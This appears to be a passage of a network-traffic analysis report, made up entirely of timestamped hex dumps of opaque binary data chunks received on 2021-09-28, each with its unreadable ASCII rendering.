                                              2021-09-28 11:02:14 UTC148INData Raw: 96 1b 0c c9 b1 88 08 e6 8d 97 32 d4 4e 60 23 bb f0 8b f4 f0 46 a8 5a cc 47 fa 03 46 d4 72 13 aa 88 c8 6e 98 ff bd 8e c8 c4 92 e9 50 f9 d4 69 34 36 70 bb 9a 5f a3 ee cc 0d 73 c6 2b 4f 79 20 e2 79 8c 50 05 67 6a e7 2b e8 54 03 82 23 81 72 e0 94 be 91 1f c1 57 ca f4 e8 cb f5 bf 55 cc 06 c8 0e e2 31 c4 0d d9 31 13 4c 59 1d f7 fd de e2 d6 89 73 71 58 ab bb bf e4 dd b0 8f 4f ca d8 76 10 d3 5b 5c cb 7b 09 d0 d8 96 c2 72 72 13 d4 6e bb 81 7b bd 4c 6c f5 3b be bd 6c b9 f9 ff 02 33 ec 15 e3 96 dc 63 c8 f9 4e 05 b1 15 f0 d1 c8 69 d0 21 40 52 bd e0 c7 f4 0b 63 f5 76 bf d0 92 37 b8 dd 49 c3 7a 69 f6 c9 cb 87 08 b6 a2 aa 35 9d 0c 65 45 2b e5 ac 43 61 78 0b 0f 2a ce 17 d5 51 80 9c 3f 79 5c 06 72 ef 59 83 71 fd 97 80 08 db 51 a5 61 7f 7b 09 a7 67 fc 47 44 a4 3d 0d 93 74
                                              Data Ascii: 2N`#FZGFrnPi46p_s+Oy yPgj+T#rWU11LYsqXOv[\{rrn{Ll;l3cNi!@Rcv7Izi5eE+Cax*Q?y\rYqQa{gGD=t
                                              2021-09-28 11:02:14 UTC149INData Raw: 98 dc db 7e 65 71 57 99 2c 95 f6 9a d5 2f 83 60 7d 1a 0d bc 95 34 50 ee 88 54 28 8a 15 0a 86 de d9 2e cf 66 74 7a ee 9f d1 ab c8 28 69 14 ea 44 8c d4 43 c0 8d 77 c6 8f 82 a5 5f 96 a7 ba da 76 d9 b4 b5 b6 c1 0e f2 db 18 c2 b3 9e da 45 77 da 90 b0 55 dd a7 18 ee b6 09 75 89 66 e3 62 54 87 66 57 92 38 ee bd 55 b0 2f 73 6c 73 e3 d5 3e a4 f2 9b 74 78 a4 af 80 8b c8 47 9f 42 ac 16 c3 18 5a d3 b0 96 f3 d4 18 05 ea e5 e2 5d c0 5e 66 4d 6f b2 2d a0 04 09 3a e5 48 7a b3 4b f5 8b d7 fc 3d 4f 5c 14 9b 47 f9 7a ea b7 cb 43 07 41 04 0e 7f 85 cc f3 99 5c 41 f0 2a 71 6d e2 52 82 c2 8e 48 41 f1 69 26 8f 9e bd 44 c9 27 3a 19 a5 17 fb 9f 8c ae d1 7f 18 dd 7b bb 89 9a 62 73 2e 84 a8 34 b4 b2 2b a2 41 4a ca 35 66 20 c6 6c 11 5d 86 b7 48 80 31 f7 8b 34 22 6d 2b 29 77 d6 98 c1
                                              Data Ascii: ~eqW,/`}4PT(.ftz(iDCw_vEwUufbTfW8U/sls>txGBZ]^fMo-:HzK=O\GzCA\A*qmRHAi&D':{bs.4+AJ5f l]H14"m+)w
                                              2021-09-28 11:02:14 UTC150INData Raw: 88 12 66 e1 71 94 df 1d 27 6f 30 91 86 d0 29 94 47 73 b5 c6 e7 0a 01 c7 3e 1f 3a 35 5a 7f 10 9e 64 a4 68 16 9f f2 44 48 f5 e6 2f 89 60 54 68 d1 63 ba d7 e0 a3 00 c4 67 8c c3 79 0b 38 7a 27 24 3e 47 fa 66 f0 10 52 4d 54 2f 1b 2c 1f 07 99 39 99 fd e3 da 65 23 78 a7 a2 55 4e 71 a5 ca ab 0e cd 53 53 11 0d 75 35 57 2f f6 0c a7 6d dc 7b a8 37 dd 3c 33 62 7f d9 31 22 77 85 fe 7c 5e e6 87 bf 7d 02 a4 c1 4b 0c c7 00 77 57 8d c8 6d 21 39 2c fb b8 65 fc 11 c1 cd 18 74 cf 2a bc 1b b5 8c ee a3 75 e9 de 76 b4 b2 a0 17 12 bc 53 d7 45 90 40 c3 06 af 4f 77 39 04 6d 66 96 c4 c6 ea 11 45 d1 57 18 d2 f5 c5 43 f9 a9 51 98 42 92 7b ab 21 c0 3f 0b dc 75 12 b2 68 84 52 06 d6 03 e9 74 a1 c3 07 a0 7d 42 82 6d 9b e0 00 18 48 ca 28 45 23 24 10 5b 5e 37 28 3f 90 d5 60 6e aa 26 6e 7a
                                              Data Ascii: fq'o0)Gs>:5ZdhDH/`Thcgy8z'$>GfRMT/,9e#xUNqSSu5W/m{7<3b1"w|^}KwWm!9,et*uvSE@Ow9mfEWCQB{!?uhRt}BmH(E#$[^7(?`n&nz
                                              2021-09-28 11:02:14 UTC151INData Raw: 86 df c8 17 09 5e 6e a0 65 65 6c 68 c7 24 e5 e6 c5 ae 26 98 28 9a b0 82 fc aa 77 2c 9d 42 2d b4 53 99 e9 4c 90 14 f6 76 f7 82 31 78 e4 87 b0 83 88 f1 31 60 77 4b c6 fd 50 b2 71 ab db e5 3a 77 ed cd 02 ae 26 ff e2 f7 d1 14 ba 9b 6c 1e c5 73 df e9 f7 fe 84 24 65 a2 08 e9 cb e0 ba 53 ed d1 e5 49 f3 37 57 f1 0e b4 99 69 1e 68 bc c7 64 3d ee ac 94 d4 5b 89 b9 37 2d 5c 79 4c 24 30 81 28 af d4 0a 35 d8 3b 3f 00 4b 71 16 d1 76 98 53 93 1e ed ac 05 ca 16 83 fb a9 6a a6 bc 7c dc ba 5d 2b d5 bb ee 35 14 cc 7a 12 fe 97 e0 c9 91 bb 6b 55 4f a8 32 49 e1 9e cf e8 91 0b 1a 31 e5 20 6f 0f a3 9b 72 71 1f af 8c 81 96 11 2a 5d 38 50 e7 d0 01 4d 3c 7d 9d 83 7c a5 5d f9 e0 28 8a b4 52 d4 f0 32 42 4a ea 2b 67 78 d2 10 3d eb 1d 7c 07 7a 38 d7 b8 44 99 9f 8c 20 f0 d0 21 49 f2 5f
                                              Data Ascii: ^neelh$&(w,B-SLv1x1`wKPq:w&ls$eSI7Wihd=[7-\yL$0(5;?KqvSj|]+5zkUO2I1 orq*]8PM<}|](R2BJ+gx=|z8D !I_
                                              2021-09-28 11:02:14 UTC153INData Raw: 65 6d ba 91 2d 57 c8 8f 25 f3 97 a0 24 75 c3 d9 d1 ca 71 16 db 1f e5 31 24 c0 fe 50 a5 2b 95 77 45 39 74 a6 7d 47 bf 76 8d 9b 30 6e c4 23 b0 6a a1 13 b3 76 d5 25 5e 1d 63 34 2e c3 d4 86 b7 48 10 f7 6a 3f e7 c6 f2 25 a7 a8 5b 87 4f 80 28 be 50 c6 3e 08 d7 24 41 e1 37 6e af f4 52 f9 47 8b 0e 73 b9 13 dd eb 3c a3 41 68 df db cf 42 b5 ce e2 c3 a3 9a a7 b5 b2 fc 47 2b 95 c4 3d fc 9b 86 f3 6f 2b 8c 95 89 16 3d 4a f0 29 d2 b3 b2 bc 60 68 25 aa 4d 61 cb 40 77 a8 1e a6 49 b2 12 ce 3f f9 18 30 0f f1 70 77 44 fe 12 b6 36 c6 93 a5 43 b1 48 4c 42 e4 3c 70 81 23 22 e8 77 81 75 a9 49 a5 67 b8 92 ec 2c 26 db ff 2a f3 ae e6 64 4f 2a 84 c9 06 ad 8c 51 0a 9c b6 a7 c7 2b 1b 23 8e 1f 41 dc 83 9a 93 de 0e f3 10 73 1d 34 8f 01 e0 f9 a0 51 00 ce e3 87 6c 2c 6b e7 50 d2 15 12 7a
                                              Data Ascii: em-W%$uq1$P+wE9t}Gv0n#jv%^c4.Hj?%[O(P>$A7nRGs<AhBG+=o+=J)`h%Ma@wI?0pwD6CHLB<p#"wuIg,&*dO*Q+#As4Ql,kPz
                                              2021-09-28 11:02:14 UTC154INData Raw: cc 03 22 e2 f7 5a 89 9f f0 c7 d5 92 53 ce 3a f4 91 68 90 c7 56 8d 52 80 a3 f6 2e d5 d1 3c bf d4 47 5b bb df a3 52 66 a6 30 5a b6 f7 93 b8 ca c3 06 30 2c ab 4e 0e b5 cb ae 8c f2 4b 49 7d b6 77 33 a5 06 0c e3 92 82 05 39 25 37 aa b3 ec bb c6 28 4e e1 8e fa bf 57 4b 85 76 91 0b 26 ee 10 46 8c 25 1b db b9 ac 2f 98 8e 95 28 e6 ca 0c 88 a6 c8 a1 fa 1a 72 bb 5b 74 5a fd 3d 4d d3 a5 13 86 a0 d6 11 84 d9 be 84 dc db af da 75 f5 e4 d0 65 6c b6 7f 56 8d a8 23 04 cc 2b 37 fb a8 99 c8 ef 8c 58 87 f2 ee b2 34 f9 2e ac f6 58 f9 54 cc 87 12 c3 7c e3 28 8c e1 14 04 3b b3 4b 9f 36 c1 4d 17 14 c6 33 ef 7a e2 ef 93 b8 cb 20 0c 30 2c 24 8a 9c 69 dc 29 31 2f 95 58 32 22 5b 67 79 e5 aa 55 29 ca 5d e6 bd 06 49 08 5e fe e1 91 4c ea 21 3a e9 92 89 67 70 da 3a 3a 13 1e 57 57 03 99
                                              Data Ascii: "ZS:hVR.<G[Rf0Z0,NKI}w39%7(NWKv&F%/(r[tZ=MuelV#+7X4.XT|(;K6M3z 0,$i)1/X2"[gyU)]I^L!:gp::WW
                                              2021-09-28 11:02:14 UTC155INData Raw: c5 a2 40 69 d8 dd c1 5c 23 37 c5 10 f0 fc e1 8b 59 57 0d 80 3c 31 91 3c 71 a2 4e ea 2c c7 0d c6 60 a2 57 70 16 a0 29 39 38 56 f9 5c c1 2f 71 1f f3 18 bd b3 a2 5d b3 a4 4f d8 eb 6c e1 16 8d 77 96 2b e2 60 5f 21 e5 b6 1b 16 da 1a 74 46 da fa 8c 2b 2b ca 21 22 e3 b7 47 5d 75 03 ed e4 c1 46 9b da 35 68 50 53 41 c3 1e af da b9 e6 39 ba 58 09 20 b7 e1 35 0f 6d ca 6f 50 cf 4a d8 4d 60 2d 05 cd 3b 68 93 af 2f 7e 4a 52 04 f8 ad ef 08 a7 62 2c b0 94 37 36 00 55 6a 7a 7f 4d 5b 5a b8 bb 15 51 4f 50 c6 e2 12 13 c3 63 73 62 36 8e 84 16 73 65 a0 2c 7a 78 68 ce be db 0b cc 8a f6 c8 1e 7b f5 0c bc 41 08 25 30 b0 d4 f1 b7 52 58 bb 30 5c 20 e2 da 20 1d 84 61 fc e8 32 e1 36 5d 64 b0 eb e9 34 0e 41 52 93 44 4b 6e 5b d7 3b da d5 e2 c3 3a a4 01 e1 ab b0 c4 2e aa f6 0d bd b4 5c
                                              Data Ascii: @i\#7YW<1<qN,`Wp)98V\/q]Olw+`_!tF++!"G]uF5hPSA9X 5moPJM`-;h/~JRb,76UjzM[ZQOPcsb6se,zxh{A%0RX0\ a26]d4ARDKn[;:.\
                                              2021-09-28 11:02:14 UTC157INData Raw: c1 d0 af 60 e8 a7 f0 ce a5 b3 e3 a7 37 8a 8e 87 3e 94 39 d0 e9 0b 00 88 b2 42 a5 a5 79 27 18 56 15 30 d6 65 17 30 49 f9 3a f8 73 21 95 0c 8c 4e 6c df 3e 84 04 ef 78 1c f6 d5 da 73 89 5f dc 37 ce e2 cb 33 ef 1b bc 3f 3d 6a 54 1b ee cc d4 d4 cb 36 30 c3 35 c6 b8 92 2b c5 b6 9f d7 fd 81 7a d9 01 1c bb 2a 97 c4 5f 19 7a 2c f6 fd be 26 f9 7c 1e b4 d1 e5 24 1b c5 58 7b 7f 6f 3d 26 4d ce 2e ce 21 53 a2 bb 37 11 9e 8a 47 d2 1a 2a 17 a9 0e e2 8e bd 96 70 b7 01 fa 9f 6b 52 4a 33 4f 68 4a 6b dc 7e c0 6a 6d 57 4c 36 53 0d 25 3e bd 4f bd c1 da b3 69 1c 5d df 55 95 9e ac 70 74 7b f4 16 8b 86 cd a0 a1 ff 86 f0 27 d0 68 ae 1f 90 58 e0 00 fd e2 d4 a2 53 e4 d4 9e 5e 11 99 a8 02 00 98 6f 5e 94 cd 5e 03 d1 14 7c 5f b6 f4 57 76 17 3c 88 b8 7f e1 05 c9 c5 59 04 b9 41 df 6d ce
                                              Data Ascii: `7>9By'V0e0I:s!Nl>xs_73?=jT605+z*_z,&|$X{o=&M.!S7G*pkRJ3OhJk~jmWL6S%>Oi]Upt{'hXS^o^^|_Wv<YAm
                                              2021-09-28 11:02:14 UTC158INData Raw: ac ba 71 92 c2 05 0a 89 b0 8d 9c f1 27 6e 23 fd 40 ad d7 6b 4b ed ab fe a1 8f 94 be 86 b1 a7 53 7d f2 a5 87 92 31 24 e0 fd 1c a1 b7 bc c9 77 53 d3 91 87 7a e9 b9 f0 b1 14 27 6c b7 7b 26 49 67 a1 dc 76 9c 16 f3 a5 9c 79 ea 88 8a e8 14 0e f2 6d 1c 4a 9a b7 66 53 c8 3c 85 98 52 a4 7c 3a 1a c3 8a 9c 78 3c 60 68 bd 25 2c 18 1f 9f 76 91 80 93 a6 68 ee 42 ea e7 f0 8a f1 34 5e a1 02 58 d2 07 f2 e6 64 90 14 82 0c f6 c6 69 13 9e f9 c6 f4 88 af 38 05 05 12 8a 94 3d cb 3b a8 b7 ed 48 0d 6b 75 e0 6f f9 3f 29 27 17 cc 7d 5b 9f b5 1b 95 20 1f 2a 1b 54 f9 9d 5b c7 0f 20 1a 1e 9c 3f 04 39 96 36 e8 9a 1b e1 53 a0 41 2c 46 a7 d4 63 27 cd da 8c e2 60 a3 92 74 50 27 60 77 04 06 b4 02 a5 ec 11 3f b0 72 66 43 2b 11 7e aa 04 ed 32 ff 6f ac f2 52 98 69 af ab cf 19 c4 dd 5f e6 8b
                                              Data Ascii: q'n#@kKS}1$wSz'l{&IgvymJfS<R|:x<`h%,vhB4^Xdi8=;Hkuo?)'}[ *T[ ?96SA,Fc'`tP'`w?rfC+~2oRi_
                                              2021-09-28 11:02:14 UTC159INData Raw: 5a 93 20 c9 be 1d 7e 95 e9 6b 68 8b 3f d2 d4 e1 7c f8 3f 41 75 28 a7 7f c3 3a 46 e2 8f 99 ba be 99 af d8 63 c8 76 93 cd eb f9 84 ac bd 91 cc 2f 4f e0 87 9c e4 21 6c 01 d1 27 d9 f2 dd 25 15 00 8a 6d f0 e0 b6 84 f0 9b fd 89 45 ae 08 9e 77 d3 38 c8 29 9c b9 bb a5 6f a3 94 dc 32 57 94 e9 5a 51 02 fe ef 30 71 f7 a4 77 be e1 eb 24 72 db 92 f8 f8 5e 2e ab 30 d6 12 25 f8 e6 6b 98 19 b1 06 0e 51 0f d1 42 60 d5 2b 18 13 a8 b3 1a fc 68 e8 01 bd 52 9f 64 8b b1 f9 c8 e0 8c 78 21 5b 14 9a d3 40 8b b6 6a 29 07 ee 2a 7e 8c 50 9d 3b ba 36 38 ad 6c 2d e5 5f 44 e3 13 07 d8 de 6a 99 33 a3 73 02 c9 66 ec 9c 7b 9f 4a 35 b9 af c0 45 a3 ca 98 9d ea e2 e1 95 9a 80 35 61 ca f6 16 90 e9 be 8b 45 73 ee e3 f8 69 1a 6f c3 2e c9 fd ce bc 6d 10 4a 89 54 62 c3 45 02 cc 33 86 70 8c 70 87
                                              Data Ascii: Z ~kh?|?Au(:Fcv/O!l'%mEw8)o2WZQ0qw$r^.0%kQB`+hRdx![@j)*~P;68l-_Dj3sf{J5E5aEsio.mJTbE3pp
                                              2021-09-28 11:02:14 UTC160INData Raw: 11 d9 1c 6b ed 19 9c 30 b4 0c 4f a9 ed 68 34 14 2a 32 5d bf aa ed 95 7f 84 50 a2 36 dc a7 97 4a 00 6e 7f 8c 23 bc 77 63 79 75 a9 23 16 e8 d7 7c a5 07 6b 5c 6b 11 f8 88 70 b6 52 72 5f 2b e8 48 62 48 c4 7a bf d7 06 e1 3e 1b f2 8a f1 0b 2c d2 8b 74 73 38 66 f2 0c 71 fb ee c0 a7 ae fb ec 4d d3 38 09 95 af 66 b7 b6 9c d6 fd f6 51 c3 10 d1 08 ae 6e 1f 8b 7a 88 4f 67 18 d5 73 5c f0 63 02 d6 b1 47 7e 6a b0 97 49 ac f2 44 13 6c 5a 3f 05 aa e5 f2 60 8d c0 42 22 9b 8a d3 77 61 48 d7 6b 5c e4 55 3d ec e5 8a 61 04 13 1c 8f 9d e5 a0 df 38 56 e1 d2 b0 e2 7d 12 c6 14 ec 40 42 8d 7f 3d f8 47 78 ad da 9f 47 a1 f8 a3 48 8e a5 75 88 d3 8d ee b4 5f 3d d5 2b 20 7c 92 16 7b fd fe 09 a8 98 e9 3d bc ee a9 90 f5 b9 fd bd 1c af b2 b8 43 b2 70 e6 98 60 77 ab 8b 6a 92 85 7b 3e 23 62
                                              Data Ascii: k0Oh4*2]P6Jn#wcyu#|k\kpRr_+HbHz>,ts8fqM8fQnzOgs\cG~jIDlZ?`B"waHk\U=a8V}@B=GxGHu_=+ |{=Cp`wj{>#b
                                              2021-09-28 11:02:14 UTC162INData Raw: 48 70 15 7e 86 08 3b 99 50 53 5c fe f9 45 b5 25 8b 65 ce 20 c5 4e a3 9c d8 f8 fe 88 5b 1e 01 24 fd b2 4d c0 e3 0f 2e 13 99 39 7c 8a 4d ab 4e bc 38 de 62 fd c2 0d 9a db 71 af b5 6e 33 f9 7d d3 30 ba aa 4d ea 3a 6c 83 13 8a b6 47 46 4b 96 70 01 6f 5d 1c 2a 2c 67 6a 79 e2 a1 06 13 e1 76 08 2d 5f 80 98 33 2e 76 bc d4 82 37 e5 03 2c 16 62 ac b6 c1 2b f4 d9 61 ca a8 4d 9c 2e ce 26 c0 0e 5c 8e 79 54 3f 85 4f 17 2f 60 d6 73 fb 12 4d 0f d6 7d 8a 82 8d 72 ac c9 35 89 bd 3a a2 1c f0 3a e3 4d 8e 4c 32 5a 90 cc
                                              Data Ascii: Hp~;PS\E%e N[$M.9|MN8bqn3}0M:lGFKpo]*,gjyv-_3.v7,b+aM.&\yT?O/`sM}r5::ML2Z
                                              2021-09-28 11:02:14 UTC162INData Raw: 78 76 bf 71 23 20 a2 93 e4 49 55 8c 4a 42 85 c8 20 36 18 6e d6 f7 c9 6f be fc 29 7c 69 71 77 a6 76 a1 d8 b1 d3 31 b1 53 4a 09 8f c2 0c 35 54 ea c8 a7 2a 8a b9 13 a3 f3 eb 76 ef 95 7a fe ee bf c1 b2 c8 28 51 6f b3 34 e5 bc 0e 35 f3 ee c7 8f e6 3c ab 94 b7 ba 40 53 d7 e1 c6 df 71 0c f2 db 48 32 9f 9e 36 76 7d f2 9e f0 39 b4 ef 9a 90 2f 08 75 8d 46 14 60 54 8d ab cd 1c 16 c1 93 a0 b2 2f 89 4d 13 cf c3 fa bd db b6 76 78 ab 84 02 f5 05 46 9f 46 15 e1 c1 18 19 4c 95 bb 9e f2 38 f3 ee e5 e2 7d 63 70 66 4d e2 9a 00 a2 3d 0f 10 63 2f e3 b2 4b f0 ab 20 fe 3f 4f c6 31 bd 54 df 5a 13 b5 cb 43 67 1b 28 0e 06 9a dc db bd 5e 41 f6 09 f7 13 7b 7d 82 c6 ae 9a 43 f1 69 bd aa b3 af 63 e9 df 38 11 a5 37 91 fe 8c ae ce 60 30 f0 79 b1 8f b0 e0 0d b7 46 bb 31 94 4b 29 a2 41 da
                                              Data Ascii: xvq# IUJB 6no)|iqwv1SJ5T*vz(Qo45<@SqH26v}9/uF`T/MvxFFL8}cpfM=c/K ?O1TZCg(^A{}Cic87`0yF1K)A
                                              2021-09-28 11:02:14 UTC163INData Raw: 01 4c 0c 14 c2 d6 cc e4 d9 1f 15 c1 53 ab 8c b1 5c d8 ba 8f 4b e3 82 63 24 f3 2e 77 d3 52 37 a6 36 90 86 5e 65 3b de 63 ff b4 57 3f 08 d5 75 26 bc 9d 7c a1 30 e5 9e 16 e2 18 0c ac 0a 61 8d eb 5c 5c 9d 15 0e cc 29 5e d4 21 7c 5b 09 86 58 f5 b2 6c 1c bd bb d0 02 b3 c7 f4 51 e5 8d 8c 4d ef c0 a5 20 81 a2 aa 29 94 0d 6d 47 2b e5 86 07 38 a5 39 05 2e 9e ca a5 77 a2 06 8d 7a ec 39 70 3d 9b ac d3 c4 25 aa b9 d1 ec b2 6b 52 0c 27 03 54 74 39 5a b9 4a 0e b9 a7 49 31 21 ea 88 02 d3 9a 2e 2a 1d d1 21 09 bb 66 61 c5 14 3b 77 54 9c 8a e7 4a bc 13 9d 3b 7e 97 91 a4 41 c9 f7 58 d1 b6 88 3e 62 a9 3a dd 7a bf 5c dd f1 87 70 44 cd 32 e1 65 88 ca f2 c0 b5 7e b0 67 fe d0 99 eb 74 cc 5e 7e 65 65 af 56 b3 03 7e 1f 33 fe 7b 30 ce 6a 4d 8b 0e 29 cc 1c b0 7f 76 c9 a4 a3 c7 0a 3c
                                              Data Ascii: LS\Kc$.wR76^e;cW?u&|0a\\)^!|[XlQM )mG+89.wz9p=%kR'Tt9ZJI1!.*!fa;wTJ;~AX>b:z\pD2e~gt^~eeV~3{0jM)v<
                                              2021-09-28 11:02:14 UTC164INData Raw: b3 2d 85 4c 9b ce d7 3f bd da f5 72 78 a2 84 00 0f 51 fd 9e 44 8c e0 c1 f3 45 49 95 a6 e2 f8 39 48 e9 e7 e3 7d 96 e5 67 4d 75 9b 02 b4 05 d3 11 61 36 e3 b2 bc f7 ab 20 e3 3d 56 c7 ed b7 57 df 5a 1d c2 cf 43 27 06 28 28 7e 44 dd de b4 5e 41 e3 21 f7 13 66 53 ab c7 49 b1 46 f1 79 bc 0b b7 af 62 f4 df 11 18 48 36 93 b3 8c ae 82 48 30 f0 64 bb b9 b1 0f 0c b5 85 a8 30 5f 4f 29 a2 5c d0 d7 19 81 07 e4 94 13 5d 11 96 c8 ac 30 f5 ae 1d f7 6e 29 2f 5d 50 90 79 b7 8c 49 6c ca 3d d9 03 46 77 2a f3 8d 89 58 9b 1c ca c2 0e d3 19 dd c2 ba 6d 21 bd 78 ca bd 5d 69 f0 81 e8 1c 3f f9 56 2a ed a5 c0 fc 8a e6 5c 67 64 d2 2f 76 ca 72 f5 d3 a7 24 2a 45 93 2c 4a c8 7e 40 be fd d9 6a 44 40 56 93 d6 b0 ee 93 31 4a fe 43 c1 a2 67 52 a6 27 8a 39 27 e7 1c 42 95 4b 09 c9 ae c7 22 ad
                                              Data Ascii: -L?rxQDEI9H}gMua6 =VWZC'((~D^A!fSIFybH6H0d0_O)\]0n)/]PyIl=Fw*Xm!x]i?V*\gd/vr$*E,J~@jD@V1JCgR'9'BK"
                                              2021-09-28 11:02:14 UTC166INData Raw: 75 45 d5 f1 19 06 e2 16 8d ce 86 4e 1a 67 5f 21 bb 7f 71 c3 a3 3b 74 b5 b4 fe 7d d6 7a 83 4f 42 dd d9 da 1d 9c 98 76 f2 b8 66 88 f7 77 3e 63 9d c7 25 13 66 e1 9a 76 89 e3 49 3a 40 84 ef 0b 15 ed 8c 73 35 dd fe 32 75 f2 01 f3 3e e0 70 57 06 69 e0 ef 8f ac c4 b2 99 ba b0 01 32 a4 41 32 73 aa 8b 74 ac e8 a8 1d d0 21 b7 92 34 ee 47 2b 8a ae 4d 9b 89 22 88 b8 b7 ef 12 c4 6d 2e c0 1c 8b 1a 33 22 d5 81 05 fa 9d 6c e5 95 a8 ba e8 84 f9 41 3c cf 03 e8 e4 bd 8a a3 bc cf 94 ba 8e 46 f5 e6 99 64 b4 c9 1c eb 1c 3d 47 c7 c9 9f c9 4c 11 8b a3 3f 79 ad 6c f8 84 ac 27 21 61 c2 4e 32 78 35 86 6a 3c cf 0d 25 90 73 5d 39 db 77 cc cd e9 18 e5 22 fe 0f 25 56 87 67 f7 38 cc c2 ee fc 12 4c 4d ba 52 1b d6 b6 17 5e 2a a9 05 6a 74 6c 6b 2b 4d 7a 57 68 ca 21 a1 aa a9 3a 71 3f 68 f0
                                              Data Ascii: uENg_!q;t}zOBvfw>c%fvI:@s52u>pWi2A2st!4G+M"m.3"lA<Fd=GL?yl'!aN2x5j<%s]9w"%Vg8LMR^*jtlk+MzWh!:q?h
                                              2021-09-28 11:02:14 UTC167INData Raw: d6 ef b6 70 34 e4 93 13 ca 87 07 d5 aa 31 60 97 2e 0d 69 2b d8 5b 62 e4 5e b7 48 55 5e f7 3a 21 2f 43 45 28 f5 78 1a 59 e5 1e cc 81 98 d0 22 dd c4 ba 9a b1 a1 7a cc a0 ab 23 c3 8b ec 1e a8 e8 65 20 ee a5 57 e0 9f 86 5b 7a f1 d1 3f 74 cc a3 49 d2 b4 3b 2c 08 05 37 5b c8 79 40 49 ab cf 68 42 41 c3 df e5 ac ea 91 f4 4b ed 96 f7 a2 90 55 96 78 8d 27 08 ea 0e 40 93 31 c8 c8 9c b4 26 cb 79 96 27 fc ce 1e 97 bd c2 8d d2 3c ea af 49 54 64 d7 79 62 e7 bc 17 aa 1f e9 3c ad f9 bd 4d eb ff bd ed 50 68 ff f8 48 a9 71 4c 98 6c 6c ea cc c9 e8 f0 04 58 4f 97 2e 6b 8e 56 25 9b 41 d5 29 f4 7c b9 81 30 85 59 62 7d 26 80 1d c4 77 f3 f0 f8 c9 6e 9a bc dc 30 ea c1 e0 1c c3 3d b4 1d 13 db 45 d5 db f9 de 73 fd ae 0a ee 59 3c be 02 2c cc b1 8c d5 90 d9 77 36 f1 94 15 c9 68 29 a7
                                              Data Ascii: p41`.i+[b^HU^:!/CE(xY"z#e W[z?tI;,7[y@IhBAKUx'@1&y'<ITdyb<MPhHqLllXO.kV%A)|0Yb}&wn0=EsY<,w6h)
                                              2021-09-28 11:02:14 UTC168INData Raw: fc 12 22 d5 0b f4 1b fb 9d fb f5 86 20 bd 68 f0 ee 52 ba f2 83 7f e5 88 84 f5 ab 39 cb 8c 80 10 55 4e 98 51 ab 9f 8a c6 8c 09 b5 98 58 69 48 08 0e dd 23 91 68 98 e4 af 52 ce 37 14 0a b0 48 4f 7e 26 92 3c 2b 59 a4 61 9b 25 a1 bb dd 39 d3 9b 7f dc 73 6d 08 53 b0 7b cc 5f e8 6e 4c 34 f9 b2 20 1d dd 1f 42 55 e5 97 97 36 28 e7 0c 3c 03 b6 bd 6d 45 2c a7 80 c8 6f be fc 3f 7c a1 70 38 ad 17 95 e6 f8 fd 02 81 60 6d 30 18 c3 52 3e 47 ea 20 de 2a 8a 15 90 b5 f3 3f 0e 27 9e 61 7a fa c1 95 87 c8 28 64 3c 03 47 78 d9 7e 46 43 90 c7 8f 86 85 bd 94 51 bb 5f 5f e3 a6 93 96 35 0c 72 db 2e ab 08 9f fc 56 6a f2 bd b2 55 db 0d 9a 81 0f 9f 74 bc 4a 01 60 64 04 fc 72 bf 29 de 9d db b1 c9 71 56 20 53 56 3e bd da b6 60 78 0c 82 d9 f7 4b 46 db c2 8c e0 c1 18 4c 49 02 ba 08 f0 22
                                              Data Ascii: " hR9UNQXiH#hR7HO~&<+Ya%9smS{_nL4 BU6(<mE,o?|p8`m0R>G *?'az(d<Gx~FCQ__5r.VjUtJ`dr)qV SV>`xKFLI"
                                              2021-09-28 11:02:14 UTC169INData Raw: ee 8f 97 34 fe c8 1d ba fc f3 eb df f3 4b 8d 5a 56 62 d7 11 63 f4 f8 12 d9 83 94 20 97 ff d6 0b e2 ec bf eb 41 e7 ba ce cc af 54 bb 2a 5d 6e ec cc 0d ef fb 38 7b 4c 00 0a 7b 04 ca 25 0c 40 e7 38 f2 eb 2f 66 2c a2 58 2a 71 27 90 1f c5 66 04 01 ee 4d 6f bf 78 2d be e8 c0 e0 31 d5 2d 72 1a f5 43 61 35 9e 60 de e4 fc 0f 1c e8 74 ac 39 9f 0e df dc 2e d5 ef f5 64 27 f3 03 5f 96 6b 0c a6 5a 34 c2 6d 7b 3b e8 6c 2c 86 da 2f 17 f5 84 98 ba 9d bc bb e8 ff 6f 10 4a 14 e0 b6 b8 43 c8 f9 6e 7a 9d 0d ce e9 f3 44 f7 21 92 dc 3b 9e 5e f5 18 67 42 a6 5d c0 b7 ad 61 56 5b e5 5a b8 e2 c9 5c a6 9e 97 84 aa 0e 3f 24 48 47 2b f5 86 52 1e d7 1b 29 2e de 6c d7 51 80 06 0c 54 b9 26 89 3f 7d 83 fd 74 07 aa 08 db 58 ab 8d 53 2b 18 87 4d 92 93 dd a5 3d 09 a2 bf b8 0e d0 ed a4 02 e8
                                              Data Ascii: 4KZVbc AT*]n8{L{%@8/f,X*q'fMox-1-rCa5`t9.d'_kZ4m{;l,/oJCnzD!;^gB]aV[Z\?$HG+R).lQT&?}tXS+M=
                                              2021-09-28 11:02:14 UTC171INData Raw: fa 1d 94 f6 81 fd 11 81 f7 7a 40 87 e8 0c 2d 4e eb a8 a7 2a 99 15 87 a5 03 d9 22 ef cd 55 7b ee bf 95 94 c8 05 75 8a c3 6c 8c 46 4c 47 f3 ee c7 9c 86 76 a9 84 ac 90 40 d3 d2 a7 93 96 35 1f f2 4c 39 3e 84 b4 da a2 5b f3 bd b2 55 c8 8d dd a2 c9 0a 5f 8d 26 31 61 54 87 fc 61 bf df c9 46 bb 98 2f 93 6b 21 cf d5 3e ae da f7 70 88 b3 af 02 ed 7b 47 9f 46 8c f3 c1 8f 5b 64 89 91 e2 2a 12 f2 e8 e5 e2 6e 96 84 67 ad 77 b0 00 5e 2f 0e 10 63 36 f0 b2 a8 c5 5b 31 d4 3d db ea 30 b6 55 df 49 1d de cd b3 36 31 28 56 50 9b dc db b4 4d 41 fb 35 07 02 51 53 8e f4 af b0 43 f1 7a bc 3d b2 79 7e c3 df 98 2b a4 37 91 b3 9f ae 95 68 c0 e1 53 bb 33 84 e1 0d b7 85 bb 30 0e 4d d9 b3 6b d0 e7 2e 76 06 e6 95 00 5d 28 96 38 bd 1b f7 c6 2b 0e 6f 2b 2f 4c 50 14 4d 6c 8e 7e 6c 69 0b 20
                                              Data Ascii: z@-N*"U{ulFLGv@5L9>[U_&1aTaF/k!>p{GF[d*ngw^/c6[1=0UI61(VPMA5QSCz=y~+7hS30Mk.v](8+o+/LPMl~li
